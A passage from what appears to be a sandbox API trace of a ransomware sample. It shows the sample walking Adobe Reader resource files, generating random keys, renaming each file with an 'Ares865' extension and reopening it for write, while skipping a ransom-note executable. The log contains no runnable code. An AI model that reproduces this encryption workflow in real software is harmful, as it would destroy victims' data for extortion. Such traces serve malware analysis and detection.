dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.054] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.057] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lav32.clx" | out: lpString1="lav32.clx") returned="lav32.clx" [0158.057] lstrlenW (lpString="lav32.clx") returned 9 [0158.057] lstrlenW (lpString="Ares865") returned 7 [0158.057] lstrcmpiW (lpString1="v32.clx", lpString2="Ares865") returned 1 [0158.058] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx.Ares865") returned 105 [0158.058] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav32.clx.ares865"), dwFlags=0x1) returned 1 [0158.061] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.061] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32754) returned 1 [0158.061] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.062] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.062] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.065] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.066] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.066] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.067] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lavphon.env.Ares865" | out: lpString1="lavphon.env.Ares865") returned="lavphon.env.Ares865" [0158.067] lstrlenW (lpString="lavphon.env.Ares865") returned 19 [0158.067] lstrlenW (lpString="Ares865") returned 7 [0158.067] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0158.067] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e0a8c20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lit.hyp", cAlternateFileName="")) returned 1 [0158.067] lstrcmpiW (lpString1="lit.hyp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0158.067] lstrcmpiW (lpString1="lit.hyp", lpString2="aoldtz.exe") returned 1 [0158.068] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lit.hyp" | out: lpString1="lit.hyp") returned="lit.hyp" [0158.068] lstrlenW (lpString="lit.hyp") returned 7 [0158.068] lstrlenW (lpString="Ares865") returned 7 [0158.068] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp.Ares865") returned 103 [0158.068] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit.hyp.ares865"), dwFlags=0x1) returned 1 [0158.070] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.071] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0158.071] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.072] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.072] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.075] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.076] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lit136.lex" | out: lpString1="lit136.lex") returned="lit136.lex" [0158.076] lstrlenW (lpString="lit136.lex") returned 10 [0158.076] lstrlenW (lpString="Ares865") returned 7 [0158.076] lstrcmpiW (lpString1="136.lex", lpString2="Ares865") returned -1 [0158.077] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex.Ares865") returned 106 [0158.077] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit136.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit136.lex.ares865"), dwFlags=0x1) returned 1 [0158.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit136.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit136.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.080] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=473088) returned 1 [0158.080] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.081] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.081] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.101] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.102] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.102] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.108] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="lit32.clx" | out: lpString1="lit32.clx") returned="lit32.clx" [0158.108] lstrlenW (lpString="lit32.clx") returned 9 [0158.109] lstrlenW (lpString="Ares865") returned 7 [0158.109] lstrcmpiW (lpString1="t32.clx", lpString2="Ares865") returned 1 [0158.109] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx.Ares865") returned 105 [0158.109] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit32.clx.ares865"), dwFlags=0x1) returned 1 [0158.112] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.112] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0158.113] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.113] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.113] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.117] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.118] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.118] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.119] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="litphon.env.Ares865" | out: lpString1="litphon.env.Ares865") returned="litphon.env.Ares865" [0158.119] lstrlenW (lpString="litphon.env.Ares865") returned 19 [0158.119] lstrlenW (lpString="Ares865") returned 7 [0158.119] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0158.119] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7de47620, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x47c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw.fca", cAlternateFileName="")) returned 1 [0158.119] lstrcmpiW (lpString1="nrw.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0158.119] lstrcmpiW (lpString1="nrw.fca", lpString2="aoldtz.exe") returned 1 [0158.119] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nrw.fca" | out: lpString1="nrw.fca") returned="nrw.fca" [0158.119] lstrlenW (lpString="nrw.fca") returned 7 [0158.119] lstrlenW (lpString="Ares865") returned 7 [0158.119] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca.Ares865") returned 103 [0158.119] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.fca.ares865"), dwFlags=0x1) returned 1 [0158.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.122] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1148) returned 1 [0158.123] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.123] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.123] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.127] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.128] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.128] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.129] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nrw.hyp" | out: lpString1="nrw.hyp") returned="nrw.hyp" [0158.129] lstrlenW (lpString="nrw.hyp") returned 7 [0158.129] lstrlenW (lpString="Ares865") returned 7 [0158.129] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp.Ares865") returned 103 [0158.129] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.hyp.ares865"), dwFlags=0x1) returned 1 [0158.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31744) returned 1 [0158.133] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.134] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.134] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.137] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.138] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.138] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.139] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nrw32.clx" | out: lpString1="nrw32.clx") returned="nrw32.clx" [0158.139] lstrlenW (lpString="nrw32.clx") returned 9 [0158.139] lstrlenW (lpString="Ares865") returned 7 [0158.139] lstrcmpiW (lpString1="w32.clx", lpString2="Ares865") returned 1 [0158.139] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx.Ares865") returned 105 [0158.139] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw32.clx.ares865"), dwFlags=0x1) returned 1 [0158.141] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.141] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32753) returned 1 [0158.142] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.142] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.142] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.146] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.147] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.147] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.148] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nrw38.hsp" | out: lpString1="nrw38.hsp") returned="nrw38.hsp" [0158.148] lstrlenW (lpString="nrw38.hsp") returned 9 [0158.148] lstrlenW (lpString="Ares865") returned 7 [0158.148] lstrcmpiW (lpString1="w38.hsp", lpString2="Ares865") returned 1 [0158.148] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp.Ares865") returned 105 [0158.148] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw38.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw38.hsp.ares865"), dwFlags=0x1) returned 1 [0158.150] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw38.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.150] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=288414) returned 1 [0158.151] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.151] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.165] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.166] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.166] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.170] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nrw56.ths" | out: lpString1="nrw56.ths") returned="nrw56.ths" [0158.170] lstrlenW (lpString="nrw56.ths") returned 9 [0158.170] lstrlenW (lpString="Ares865") returned 7 [0158.170] lstrcmpiW (lpString1="w56.ths", lpString2="Ares865") returned 1 [0158.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths.Ares865") returned 105 [0158.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw56.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw56.ths.ares865"), dwFlags=0x1) returned 1 [0158.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw56.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.174] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=357376) returned 1 [0158.174] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.175] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.175] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.206] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.207] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.212] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nyn.fca" | out: lpString1="nyn.fca") returned="nyn.fca" [0158.212] lstrlenW (lpString="nyn.fca") returned 7 [0158.212] lstrlenW (lpString="Ares865") returned 7 [0158.212] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca.Ares865") returned 103 [0158.212] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.fca.ares865"), dwFlags=0x1) returned 1 [0158.217] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.217] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1164) returned 1 [0158.217] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.220] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.222] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="nyn.hyp" | out: lpString1="nyn.hyp") returned="nyn.hyp" [0158.222] lstrlenW (lpString="nyn.hyp") returned 7 [0158.222] lstrlenW (lpString="Ares865") returned 7 [0158.222] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp.Ares865") returned 103 [0158.222] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 